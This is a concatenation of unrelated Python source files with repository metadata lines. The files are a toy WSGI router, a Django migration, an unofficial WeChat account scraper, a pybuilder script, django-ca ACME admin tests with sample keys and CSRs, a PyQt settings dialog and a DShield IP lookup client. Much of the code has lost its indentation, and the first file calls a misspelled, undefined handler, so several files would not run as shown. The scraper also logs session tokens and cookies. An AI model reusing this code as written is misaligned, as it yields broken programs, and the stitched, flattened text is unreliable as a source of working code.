from wsgiref.simple_server import make_server
from Controller import Admin, Account
"""
def index():
html = "return index page"
return html
def login():
html = "return login page"
return html
"""
urls = (
("/index/", Admin.index),
("/login/", Account.login),
)
def Request_Handle(env, response):
    response("200 OK", [("Content-Type", "text/html")])
    userurl = env["PATH_INFO"]
    for item in urls:
        if item[0] == userurl:
            return item[1]()
    return "404"
if __name__ == "__main__":
httpd = make_server("",8000,Request_Hndele)
print "start web server start 8000"
httpd.serve_forever()
|
zhengjue/mytornado
|
mydjiango/django_study/webframe/index.py
|
Python
|
gpl-3.0
| 832
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-17 09:06
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('polls', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='question',
old_name='put_date',
new_name='pub_date',
),
migrations.RenameField(
model_name='question',
old_name='qustion_text',
new_name='question_text',
),
]
|
wanglzh/django-study
|
polls/migrations/0002_auto_20171017_1706.py
|
Python
|
gpl-3.0
| 574
|
from .client import TelegramClient
|
Kurpilyansky/street-agitation-telegram-bot
|
telegram_client/__init__.py
|
Python
|
gpl-3.0
| 35
|
#!/usr/bin/env python
# coding: UTF-8
import json
import hashlib
import re
import random
import json
import requests
import logging
DEBUG_LEVEL = logging.DEBUG
try:
import colorizing_stream_handler
root = logging.getLogger()
root.setLevel(DEBUG_LEVEL)
root.addHandler(colorizing_stream_handler.ColorizingStreamHandler())
except Exception, e:
print 'can not import colorizing_stream_handler, using logging.StreamHandler()'
root = logging.getLogger()
root.setLevel(DEBUG_LEVEL)
root.addHandler(logging.StreamHandler())
'''base exception class.
'''
class WeixinPublicError(Exception):
    pass
'''raised when cookies have expired.
'''
class WeixinNeedLoginError(WeixinPublicError):
    pass
'''raised when unable to log in.
'''
class WeixinLoginError(WeixinPublicError):
    pass
class WeixinPublic(object):
def __init__(self, account, pwd, token = None, cookies = None, ifencodepwd = False):
self.account = account
if ifencodepwd:
self.pwd = pwd
else:
self.pwd = hashlib.md5(pwd).hexdigest()
self.wx_cookies = cookies
self.lastmsgid = 0
self.token = token
if self.token == None or self.wx_cookies == None:
self.token = ''
self.wx_cookies = ''
self.login()
'''login to WeChat, get token and cookies.
Raise:
    WeixinLoginError, when the token cannot be read from the response.
'''
def login(self):
url = 'https://mp.weixin.qq.com/cgi-bin/login?lang=zh_CN'
payload = {
'username' : self.account,
'imgcode' : '',
'f' : 'json',
'pwd' : self.pwd,
}
headers = {
'x-requested-with' : 'XMLHttpRequest',
'referer' : 'https://mp.weixin.qq.com/cgi-bin/loginpage?t=wxm2-login&lang=zh_CN',
}
r = requests.post(url, data = payload, headers = headers)
logging.info('------login------')
logging.debug("respond:\t%s"%r.text)
s = re.search(r'token=(\d+)', r.text)
if not s:
logging.error('Login Error!!!')
raise Exception("Login error.")
self.token = int(s.group(1))
logging.debug('token:\t%d'%self.token)
self.wx_cookies = ''
for cookie in r.cookies:
self.wx_cookies += cookie.name + '=' + cookie.value + ';'
logging.debug('cookies:\t%s'%self.wx_cookies)
logging.info('------end login------')
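# Login flow: the MD5-hashed password is posted to mp.weixin.qq.com, the
# session token is scraped from the response body, and all returned cookies
# are flattened into a single header string for the later API calls.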
'''get message list.
raise:
    WeixinNeedLoginError, when a re-login is needed.
returns:
    the raw message list string extracted from the page (not parsed JSON).
'''
def get_msg_list(self):
logging.info('------get_msg_list------')
url = 'https://mp.weixin.qq.com/cgi-bin/message'
payload = {
    't': 'message/list',
    'token': self.token,
    'count': 20,
    'day': 7,
}
headers = {
    'x-requested-with': 'XMLHttpRequest',
    'referer': 'https://mp.weixin.qq.com/cgi-bin/loginpage?t=wxm2-login&lang=zh_CN',
    'cookie': self.wx_cookies,
}
# the query parameters travel in the query string (params=), as a GET requires
r = requests.get(url, params=payload, headers=headers)
c = "".join(r.text.split())
s = re.search(r'list:\((.*)\).msg_item', c)
if s == None:
logging.error('need re-login')
raise WeixinNeedLoginError('need re-login')
else:
    msg_list = s.group(1)
    logging.debug('msg_list:\t%s' % msg_list)
    logging.info('------end get_msg_list------')
    return msg_list
'''get user icon.
Args:
fakeid.
uri, local uri to store this img.
'''
def get_user_icon(self, fakeid = 1155750780, uri = ''):
logging.info('------get_user_icon------')
url = "https://mp.weixin.qq.com/misc/getheadimg"
payload = {
'token':self.token,
'fakeid':fakeid,
}
headers = {
'Cookie':self.wx_cookies,
}
r = requests.get(url, params = payload, headers = headers)
respond_headers = r.headers
if 'content-type' in respond_headers and respond_headers['content-type'] != 'image/jpeg':
logging.error('download user icon error, need re-login.')
raise WeixinNeedLoginError('download user icon error, need re-login.')
if uri == '':
f = open('%d.jpg'%(fakeid),'wb+')
else:
f = open('%s/%d.jpg'%(uri, fakeid),'wb+')
f.write(r.content)
f.close()
logging.info('------end get_user_icon------')
if __name__ == '__main__':
weixin = WeixinPublic("WeChat public-platform account name", "password")
weixin.get_msg_list()
weixin.get_user_icon()
|
PyJulie/Some_Python_Scripts
|
get_users.py
|
Python
|
gpl-3.0
| 5,096
|
# -*- coding: utf-8 -*-
# This file is part of the hdnet package
# Copyright 2014 the authors, see file AUTHORS.
# Licensed under the GPLv3, see file LICENSE for details
# pybuilder script
from pybuilder.core import init, task, description, depends, use_plugin
# set pythonpath (for unittests)
import sys
import os
sys.path.insert(0, os.path.dirname(__file__))
# plugins
use_plugin("python.core")
use_plugin("python.pylint")
#use_plugin("python.flake8")
use_plugin("python.unittest")
#use_plugin("python.coverage")
use_plugin("python.distutils")
use_plugin("python.install_dependencies")
use_plugin("python.sphinx")
use_plugin("source_distribution")
use_plugin("copy_resources")
use_plugin("filter_resources")
# global config
name = "hdnet"
default_task = "release"
@init
def initialize(project):
project.version = '1.0dev'
# scripts path in egg
#project.set_property("dir_dist_scripts", 'scripts')
# build requirements
#project.build_depends_on_requirements("requirements-dev.txt")
# dist requirements
#project.depends_on_requirements("requirements.txt")
# core python
project.set_property('dir_source_main_python', 'hdnet')
project.set_property('dir_source_main_scripts', 'internal/scripts')
#project.set_property('dir_dist', '$dir_target/dist/$name-$version')
# pylint
#project.set_property('pylint_options', ["--max-line-length=100", "--no-docstring-rgx=.*"])
# flake8
#project.set_property('flake8_ignore', "F403,W404,W801")
project.set_property('flake8_include_test_sources', True)
#project.set_property('flake8_exclude_patterns', '.svn,CVS,.bzr,.hg,.git,__pycache__')
# unit tests
project.set_property('dir_source_unittest_python', 'tests')
project.set_property('unittest_module_glob', 'test_*')
# coverage
#project.set_property('coverage_break_build', False)
# sphinx
project.set_property('sphinx_config_path', 'doc')
project.set_property('sphinx_source_dir', 'doc')
project.set_property('sphinx_output_dir', 'doc/_build')
# copy resources (non source files)
project.set_property('copy_resources_glob', ['doc/_build/html/*', 'README.md'])
# filter resources (placeholder replacement)
# {variable} replaced by project.variable
project.set_property('filter_resources_glob', ['doc/_build/html/*.html', 'README.md'])
@task
@description('Release new version of hdnet')
@depends('prepare', 'sphinx_generate_documentation', 'publish')
def release(project, logger):
logger.info("Greetings master. I successfully built {0} in version {1}!".format(project.name, project.version))
|
team-hdnet/hdnet
|
build.py
|
Python
|
gpl-3.0
| 2,625
|
# This file is part of django-ca (https://github.com/mathiasertl/django-ca).
#
# django-ca is free software: you can redistribute it and/or modify it under the terms of the GNU
# General Public License as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# django-ca is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with django-ca. If not,
# see <http://www.gnu.org/licenses/>
"""Test cases for ModelAdmin classes for ACME models."""
import typing
from django.test import TestCase
from django.utils import timezone
from ..models import AcmeAccount
from ..models import AcmeAuthorization
from ..models import AcmeCertificate
from ..models import AcmeChallenge
from ..models import AcmeOrder
from ..models import CertificateAuthority
from .base import override_tmpcadir
from .base.mixins import StandardAdminViewTestCaseMixin
from .base.typehints import DjangoCAModelTypeVar
PEM1 = """-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvP5N/1KjBQniyyukn30E
tyHz6cIYPv5u5zZbHGfNvrmMl8qHMmddQSv581AAFa21zueS+W8jnRI5ISxER95J
tNad2XEDsFINNvYaSG8E54IHMNQijVLR4MJchkfMAa6g1gIsJB+ffEt4Ea3TMyGr
MifJG0EjmtjkjKFbr2zuPhRX3fIGjZTlkxgvb1AY2P4AxALwS/hG4bsxHHNxHt2Z
s9Bekv+55T5+ZqvhNz1/3yADRapEn6dxHRoUhnYebqNLSVoEefM+h5k7AS48waJS
lKC17RMZfUgGE/5iMNeg9qtmgWgZOIgWDyPEpiXZEDDKeoifzwn1LO59W8c4W6L7
XwIDAQAB
-----END PUBLIC KEY-----"""
PEM2 = """-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAp8SCUVQqpTBRyryuu560
Q8cAi18Ac+iLjaSLL4gOaDEU9CpPi4l9yCGphnQFQ92YP+GWv+C6/JRp24852QbR
RzuUJqJPdDxD78yFXoxYCLPmwQMnToA7SE3SnZ/PW2GPFMbAICuRdd3PhMAWCODS
NewZPLBlG35brRlfFtUEc2oQARb2lhBkMXrpIWeuSNQtInAHtfTJNA51BzdrIT2t
MIfadw4ljk7cVbrSYemT6e59ATYxiMXalu5/4v22958voEBZ38TE8AXWiEtTQYwv
/Kj0P67yuzE94zNdT28pu+jJYr5nHusa2NCbvnYFkDwzigmwCxVt9kW3xj3gfpgc
VQIDAQAB
-----END PUBLIC KEY-----"""
ACME_SLUG_1 = "Mr6FfdD68lzx"
ACME_SLUG_2 = "DzW4PQ6L76Px"
THUMBPRINT1 = "U-yUM27CQn9pClKlEITobHB38GJOJ9YbOxnw5KKqU-8"
THUMBPRINT2 = "s_glgc6Fem0CW7ZioXHBeuUQVHSO-viZ3xNR8TBebCo"
TOKEN1 = "grhuo1-ZmUMD8_53lQMlUN1WeURMpYkSGq5_4r-1S7JNVF3a25_xcA2K3dGtyGjt"
TOKEN2 = "3vmQafd29ROOktb7wJO_kZ8bIBlqoasegI9ElyLVRyMre_OyEPvjKjkQRxfzWprS"
TOKEN3 = "gY-kE5LdgwZyFeUCbjQKaX5Eo2lMsgabeB-m8zQ6eirhJP1WpVhenAyB7Yn-7BIq"
CSR1 = "MIICbDCCAVQCAQIwADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKZoFq9UCNpCAfqNrdD2za8W9xuS6PTZzE13iitAbex75cs894cyhvNvBsJgreQ0ZTzvEy9FDB7CSBKQebsnewcETG4v2E4QyhvEBsWEzlIYNmlXxwkQXoxy3vm4bavxIcya5Db9HPw0oo0wqUWyx_GsEu0hRGY-Ys9VPuq81w60kHiXhcwv2PQtgiDtJ-VJ4xycYMRyAzYr_R13YzMa4gXUf7Hk4hDPitG28VyVcO8f5CR0ogtzA0C3r1SdwceJog1YgQfHLbgOUDsQhfbUrBAR7Iq_3K-txkxVtzwZedjCFGjNXe4CIL6e-NDo5nbFyuNseCQjP7TXfvQxhtrCIlECAwEAAaAnMCUGCSqGSIb3DQEJDjEYMBYwFAYDVR0RBA0wC4IJbG9jYWxob3N0MA0GCSqGSIb3DQEBCwUAA4IBAQArIgdF2oMuxtHSgNrAk1_stu1bmXrr9dZ-ewbkgBaMq_o5PGh7OY3TFcF-7Uk-lbuCayHX-FcNe7X8dPiWg62ajzR_RROGGII0QiROe1Z77jtJuurE1MXnzkgYuE0JU0_9luAHHQFSCv9Nr6rO8Xy6otZfcolqwtWzSf7puOiQ5fC6Jdq5W4UAvlBfO7mqlhO7G_XCcSuzjSa1OcWSgd9zsp5Z-xYpL_4EgqXCiUsMCZ0sLhH2FuEkTw_tPEgRVUBz0ro51jijmG2Mg2N3irGv58IoElz3_NwWQewpfkIKEWzWcoG31sFJxEJapi_NuwdYAcKvYFNdPMH994rNKVjL" # NOQA: E501
CSR2 = "MIICbDCCAVQCAQIwADCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALpIUHFIMXJSJ6YfoTsDRUgut6AY6sdhprPBumVdJXoBbDUjSW4R1aJuXPXmQMDRo-D5Tkvxx7rxsWnOG3l3-vZi18Ortk27k_5f-6_7OdoujijZFYxq0T0hVvgDh47r-aY67q0-CfTNfCYRfAkbOZ8UpAbV6u0vynguHznacIywl2NB5wmlDTLBo0CYp2ElRDfaj-Syhh6fwMTpDXs43wQJelJvDjOgMAPbcW1CiSnamIt3nSxwQjSOrAs6r-nIZblgPsQCvjjuF55okC4tjDqMSk2Qtq5bQwh9OO-AX9xTFCBeH8rqycqgPkIustUsFJEbOayQa4w2JWumgysFATkCAwEAAaAnMCUGCSqGSIb3DQEJDjEYMBYwFAYDVR0RBA0wC4IJbG9jYWxob3N0MA0GCSqGSIb3DQEBCwUAA4IBAQAxc3zi_S79F_M5I8SFR4IOfJOt1pU1z6tsGNcVeK_vN-8jCMuQiicBlEwcauxox7KO1czMFX_Ikq-W_ctc2RhqfD4GsU80KDrDLQarZ1KC6egSXrHcuYqTeqRdNtnExCCrzRlUzaB5kojUpmdnRJ48rFgoLHuTxPd47vqTQahzx0xl3xhM-VQmQFc-urvIcyYNR620qA9b84lOwmzT9duRjYIrAS1H2vRatNqRU8tDAhbuvu-_yU_U0lo3gQcK5NGLVR45qU-yr0SgYIKgfkL6E6W9B80xT5Qt4Py7WZCSvrUOLC2uco_jDODrY-xCky7Tbalu1_FEzF-nkSEDK_x0" # NOQA: E501
class AcmeAdminTestCaseMixin(
StandardAdminViewTestCaseMixin[DjangoCAModelTypeVar], typing.Generic[DjangoCAModelTypeVar]
):
"""Admin view mixin that creates all model instances for ACME."""
load_cas = (
"root",
"child",
)
cas: typing.Dict[str, CertificateAuthority]
def setUp(self) -> None: # pylint: disable=invalid-name,missing-function-docstring
super().setUp()
kid1 = self.absolute_uri(":acme-account", serial=self.cas["child"].serial, slug=ACME_SLUG_1)
account1 = AcmeAccount.objects.create(
ca=self.cas["child"],
contact=f"mailto:{self.user.email}",
status=AcmeAccount.STATUS_VALID,
kid=kid1,
terms_of_service_agreed=True,
pem=PEM1,
thumbprint=THUMBPRINT1,
slug=ACME_SLUG_1,
)
kid2 = self.absolute_uri(":acme-account", serial=self.cas["root"].serial, slug=ACME_SLUG_2)
account2 = AcmeAccount.objects.create(
ca=self.cas["root"],
contact=f"mailto:{self.user.email}",
status=AcmeAccount.STATUS_REVOKED,
kid=kid2,
terms_of_service_agreed=False,
pem=PEM2,
thumbprint=THUMBPRINT2,
slug=ACME_SLUG_2,
)
self.order1 = AcmeOrder.objects.create(account=account1, status=AcmeOrder.STATUS_VALID)
self.order2 = AcmeOrder.objects.create(account=account2, status=AcmeOrder.STATUS_PROCESSING)
auth1 = AcmeAuthorization.objects.create(
order=self.order1,
type=AcmeAuthorization.TYPE_DNS,
value="example.com",
status=AcmeAuthorization.STATUS_PENDING,
wildcard=True,
)
auth2 = AcmeAuthorization.objects.create(
order=self.order2,
type=AcmeAuthorization.TYPE_DNS,
value="example.net",
status=AcmeAuthorization.STATUS_VALID,
wildcard=False,
)
AcmeChallenge.objects.create(auth=auth1, status=AcmeChallenge.STATUS_PENDING, token=TOKEN1)
AcmeChallenge.objects.create(
auth=auth2,
status=AcmeChallenge.STATUS_VALID,
token=TOKEN2,
validated=timezone.now(),
type=AcmeChallenge.TYPE_HTTP_01,
)
AcmeChallenge.objects.create(
auth=auth2,
status=AcmeChallenge.STATUS_INVALID,
token=TOKEN3,
error="some-error",
type=AcmeChallenge.TYPE_DNS_01,
)
AcmeCertificate.objects.create(order=self.order1)
AcmeCertificate.objects.create(order=self.order2, csr=CSR1)
class AcmeAccountViewsTestCase(AcmeAdminTestCaseMixin[AcmeAccount], TestCase):
"""Test standard views for :py:class:`~django_ca.models.AcmeAccount`."""
model = AcmeAccount
class AcmeOrderViewsTestCase(AcmeAdminTestCaseMixin[AcmeOrder], TestCase):
"""Test standard views for :py:class:`~django_ca.models.AcmeOrder`."""
model = AcmeOrder
@override_tmpcadir()
def test_expired_filter(self) -> None:
"""Test the "expired" list filter."""
self.assertChangelistResponse(
self.client.get(f"{self.changelist_url}?expired=0"), self.order1, self.order2
)
self.assertChangelistResponse(self.client.get(f"{self.changelist_url}?expired=1"))
with self.freeze_time("everything_expired"):
self.assertChangelistResponse(self.client.get(f"{self.changelist_url}?expired=0"))
self.assertChangelistResponse(
self.client.get(f"{self.changelist_url}?expired=1"), self.order1, self.order2
)
class AcmeAuthorizationViewsTestCase(AcmeAdminTestCaseMixin[AcmeAuthorization], TestCase):
"""Test standard views for :py:class:`~django_ca.models.AcmeAuthorization`."""
model = AcmeAuthorization
class AcmeChallengeViewsTestCase(AcmeAdminTestCaseMixin[AcmeChallenge], TestCase):
"""Test standard views for :py:class:`~django_ca.models.AcmeChallenge`."""
model = AcmeChallenge
class AcmeCertificateViewsTestCase(AcmeAdminTestCaseMixin[AcmeCertificate], TestCase):
"""Test standard views for :py:class:`~django_ca.models.AcmeCertificate`."""
model = AcmeCertificate
|
mathiasertl/django-ca
|
ca/django_ca/tests/tests_admin_acme.py
|
Python
|
gpl-3.0
| 8,514
|
from PyQt5.QtWidgets import (QWidget, QHBoxLayout, QVBoxLayout, QTreeWidget,
QStackedWidget)
from AlphaHooks.widgets.collections import Populate
from AlphaHooks.windows.settings.root import ConsoleSettings
class SettingsDialog(QWidget):
"""
Settings dialog opened from File -> Settings...
"""
def __init__(self, config, parent=None):
super(SettingsDialog, self).__init__(parent)
self.config = config
# Widgets
self.console = ConsoleSettings(self.config)
# Settings
self.widget_connections = {
"Console": self.console
}
# Settings Tree
self.settings_tree = QTreeWidget()
self.settings_tree.setColumnCount(2)
self.settings_tree.header().hideSection(1)
self.settings_tree.header().close()
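# Column 1 stays hidden: Populate stores each page's index in the stacked
# widget there, which display() reads back to switch pages.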
# Settings Stacked Widget
self.stack = QStackedWidget()
self.populate = Populate(self, display=self.stack)
self.populate.tree_widget(
self.settings_tree.invisibleRootItem(),
self.widget_connections
)
# Layouts
self.tree_layout = QVBoxLayout()
self.tree_layout.addWidget(self.settings_tree)
self.horizontal_layout = QHBoxLayout()
self.horizontal_layout.addLayout(self.tree_layout)
self.horizontal_layout.addWidget(self.stack)
self.setLayout(self.horizontal_layout)
# Slots
self.settings_tree.currentItemChanged.connect(self.display)
def display(self, current):
"""
Show the corresponding widget for the selected tree item.
:param current: the current tree item
"""
try:
item_connection = int(current.text(1))
self.stack.setCurrentIndex(item_connection)
except ValueError:
    # the hidden column held no index for this item; ignore
    pass
|
AlphaHooks/AlphaHooks
|
AlphaHooks/windows/settings/config.py
|
Python
|
gpl-3.0
| 1,856
|
from __future__ import absolute_import, division, print_function, unicode_literals
import gevent.monkey
gevent.monkey.patch_socket()
from datetime import datetime
import isodate
import requests
from xml.etree.cElementTree import XMLParser
from .base import *
from frontend.presentation import *
class DShieldDataProvider(DataProvider):
def _handle_date(value):
if value == "0":
return None
return datetime.strptime(value, "%Y-%m-%d").date()
def _handle_datetime(value):
if value == "0":
return None
return datetime.strptime(value, "%Y-%m-%d %H:%M:%S")
@classmethod
def _parse(cls, data):
# Produce an AttributeList from the data
info = AttributeList()
for key, newkey, fn in cls._handlers:
value = data.get(key)
if value != None:
newvalue = fn(value)
if newvalue != None:
info.append((newkey, newvalue))
# Determine a disposition and return the InformationSet
attacks = int(data["attacks"]) if "attacks" in data else None
if attacks == None:
disp = DISP_INFORMATIONAL
elif attacks < 10:
disp = DISP_NEGATIVE
elif attacks > 50:
disp = DISP_POSITIVE
else:
disp = DISP_INDETERMINATE
return InformationSet(disp, info)
@property
def name(self):
return "dshield"
def _query(self, target, qtype):
if qtype not in (QUERY_IPV4, QUERY_IPV6):
return None
endpoint = self._endpoint.format(target)
r = requests.get(endpoint)
r.raise_for_status()
xp = XMLParser(encoding="utf-8")
xp.feed(r.text.encode("utf-8"))
root = xp.close()
data = {}
for e in root:
if e.text == None:
continue
tag = e.tag.decode("utf-8")
value = e.text.decode("utf-8").strip()
if len(value) != 0:
data[tag] = value
return self._parse(data)
_endpoint = "http://www.dshield.org/api/ip/{0}"
_handlers = [
("mindate", "first_event_ts", _handle_date),
("maxdate", "last_event_ts", _handle_date),
("updated", "update_ts", _handle_datetime),
("count", "n_attack_packets", int),
("attacks", "n_attack_targets", int),
("country", "country", lambda x: x),
("as", "as_number", int),
("asname", "as_name", lambda x: x),
("network", "network_prefix", lambda x: x),
("comment", "comment", lambda x: x),
("abusecontact", "abuse_contact", lambda x: x)
]
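# Each _handlers entry is (DShield field, output attribute, converter);
# converters returning None cause the field to be dropped in _parse().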
__all__ = [
b"DShieldDataProvider"
]
|
slupers/ThreatIntel
|
ThreatIntel/backend/dshield.py
|
Python
|
gpl-3.0
| 2,738
|